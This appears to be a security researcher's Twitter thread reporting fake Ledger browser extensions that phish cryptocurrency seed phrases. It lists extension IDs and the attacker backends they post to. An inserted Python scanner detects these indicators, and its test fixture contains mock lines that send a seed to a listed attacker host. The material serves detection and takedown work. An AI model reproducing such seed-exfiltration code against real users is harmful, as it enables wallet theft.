⚠️ Four more @Ledger browser extensions. A thread...

cc: @Ledger @Ledger_Support @googledevs

#cryptocurrency #security #phishing https://twitter.com/sniko_/status/1236346777814601728
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)

Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Delivered via @GoogleAds again, like the linked tweet in the OP
@ZDNet coverage of the previous fake extensions - some of these function the same (using GoogleDocs) but some don't - though they are similar

I recommend reading the writeup by @campuscodi in the linked tweet for a full understanding of what's happening https://twitter.com/MyCrypto/status/1236090921373990912
⚠️Another Ledger extension on the Chrome webstore

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)

Asks for seed phrases, posts to completssl[.]com/ssnd_t.php

Same backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712

cc: @ChromiumDev @Ledger @Ledger_Support
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)

Website: myledgernano[.]com (cc: @Cloudflare)

Sends phished seed phrases to POST /device/init/payload
173.212.230.221 is hosting suspicious domains (myledgernano[.]com originally pointed here before hiding behind Cloudflare)

Domains targeting @Trezor and @Ledger customers (cc: @Mutex_Lock)

https://pastebin.com/raw/CawRZkyw 
⚠️ Another fake Ledger extension on the Chrome webstore

Extension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)

Asks for seed phrases, posts to completssl[.]com/ssnd_1.php

Delivered via @GoogleAds

https://twitter.com/sniko_/status/1243946328520118273

cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore

Extension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)

Asks for seeds, posts to usermetrica[.]org/api_v1

cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore

Extension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)

Asks for seeds, posts to usermetrica[.]org/api_v1

cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstore

Extension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)

Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minified their JS and tried to obfuscate it

cc: @Ledger @Ledger_Support

#malware #bitcoin
Another fake Ledger extension on the Chrome website

Extension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)

Asks for seeds, posts to completssl[.]com/ssnd_1.php

cc: @Ledger @Ledger_Support

#malware #bitcoin
Another fake Ledger extension on the Chrome website - pushed via Google Ads

Extension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)

Asks for seeds, posts to usermetrica[.]org/api_v1/

cc: @Ledger @Ledger_Support @ChromiumDev

#malware #bitcoin
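A defender-side check for the indicators collected in this thread, added here as an example (it is not the author's tooling): it walks a Chrome profile's Extensions directory, flags any installed extension whose ID is on the list above, and greps each extension's JS/HTML/JSON for the refanged phishing backends and the shared Google Form ID. The on-disk layout Extensions/<extension id>/<version>/manifest.json is Chrome's own; the sample profile the script builds in a temp directory is constructed test data, and the extension names in it are made up.

```python
"""Scan a Chrome profile's Extensions directory for the fake Ledger extensions
and phishing backends listed in the thread above (added example, not the
thread author's code). Assumes Chrome's layout
Extensions/<extension id>/<version>/manifest.json; the fixture is constructed."""
import json
import re
import tempfile
from pathlib import Path

# Extension IDs quoted from the thread.
MALICIOUS_EXTENSION_IDS = {
    "pbilbjpkfbfbackdcejdmhdfgeldakkn", "lfaahmcgahoalphllknbfcckggddoffj",
    "dehindejipifeaikcgbkdijgkbjliojc", "bhkcgfbaokmhglgipbppoobmoblcomhh",
    "opmelhjohnmenjibglddlpmbpbocohck", "mjbimaghobnkobfefccnnnjedoefbafl",
    "ddohdfnenhipnhnbbfifknnhaomihcip", "dbcfhcelmjepboabieglhjejeolaopdl",
    "mciddpldhpdpibckghnaoidpolnmighk", "agfjbfkpehcnceblmdahjaejpnnnkjdn",
    "mcbcknmlpfkbpogpnfcimfgdmchchmmg",
}
# Backends quoted from the thread, in its defanged notation.
DEFANGED_HOSTS = [
    "ledger[.]productions", "completssl[.]com", "myledgernano[.]com",
    "usermetrica[.]org", "walletbalance[.]org",
]
GOOGLE_FORM_ID = "1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ"
SOURCE_SUFFIXES = {".js", ".html", ".json"}


def refang(indicator: str) -> str:
    """Turn defanged notation (ledger[.]productions, hxxp://) back into a matchable string."""
    return re.sub(r"\[\.\]", ".", indicator).replace("hxxp", "http")


MALICIOUS_HOSTS = {refang(h) for h in DEFANGED_HOSTS}


def extension_name(ext_dir: Path) -> str:
    """Display name from the newest manifest.json beneath an extension id directory."""
    manifests = sorted(ext_dir.rglob("manifest.json"))
    if not manifests:
        return "<no manifest>"
    try:
        data = json.loads(manifests[-1].read_text(encoding="utf-8", errors="ignore"))
    except json.JSONDecodeError:
        return "<invalid manifest>"
    return data.get("name", "<unnamed>")


def scan_extension(ext_dir: Path) -> list[str]:
    """Reasons this extension matches the thread's indicators (empty list = no match)."""
    reasons = []
    if ext_dir.name in MALICIOUS_EXTENSION_IDS:
        reasons.append("extension id is on the fake-Ledger list")
    for src in sorted(p for p in ext_dir.rglob("*") if p.suffix in SOURCE_SUFFIXES):
        text = src.read_text(encoding="utf-8", errors="ignore")
        rel = src.relative_to(ext_dir)
        for host in sorted(MALICIOUS_HOSTS):
            if host in text:
                reasons.append(f"{rel} references phishing backend {host}")
        if GOOGLE_FORM_ID in text:
            reasons.append(f"{rel} posts to the shared Google Form {GOOGLE_FORM_ID[:12]}...")
    return reasons


def scan_profile(profile_dir: Path) -> dict[str, dict]:
    """Scan <profile>/Extensions; return {extension id: {name, reasons}} for every match."""
    findings = {}
    ext_root = profile_dir / "Extensions"
    if not ext_root.is_dir():
        return findings
    for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        reasons = scan_extension(ext_dir)
        if reasons:
            findings[ext_dir.name] = {"name": extension_name(ext_dir), "reasons": reasons}
    return findings


def build_sample_profile(root: Path) -> Path:
    """Constructed fixture: a benign extension, a listed fake-Ledger ID whose popup
    posts to a listed backend, and an unlisted ID that posts to the shared Google Form."""
    def write(ext_id, name, script):
        d = root / "Extensions" / ext_id / "1.0.0_0"
        d.mkdir(parents=True)
        (d / "manifest.json").write_text(json.dumps({"name": name, "manifest_version": 2}))
        (d / "popup.js").write_text(script)
    write("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "Benign Notes", "document.title = 'notes';")
    write("mciddpldhpdpibckghnaoidpolnmighk", "Ledger Wallet",
          "fetch('https://walletbalance.org/api_v1/', {method: 'POST', body: seed});")
    write("bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "Ledger Live Helper",
          "fetch('https://docs.google.com/forms/d/e/" + GOOGLE_FORM_ID + "/formResponse');")
    return root


if __name__ == "__main__":
    profile = build_sample_profile(Path(tempfile.mkdtemp()))
    for ext_id, info in scan_profile(profile).items():
        print(ext_id, info["name"])
        for reason in info["reasons"]:
            print("  -", reason)
```

Point `scan_profile()` at a real profile directory (e.g. `~/.config/google-chrome/Default` on Linux) to check a machine; the source grep is what catches a re-uploaded copy under a fresh extension ID, which the ID list alone misses.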
I've been quiet on this thread (and similar others) but still we are finding more and issuing takedowns.

A new malicious @Ledger extension has changed and started using Telegram as their c2...

Not the first time we are flooding a c2 - see quoted thread

https://twitter.com/sniko_/status/1202990606638878720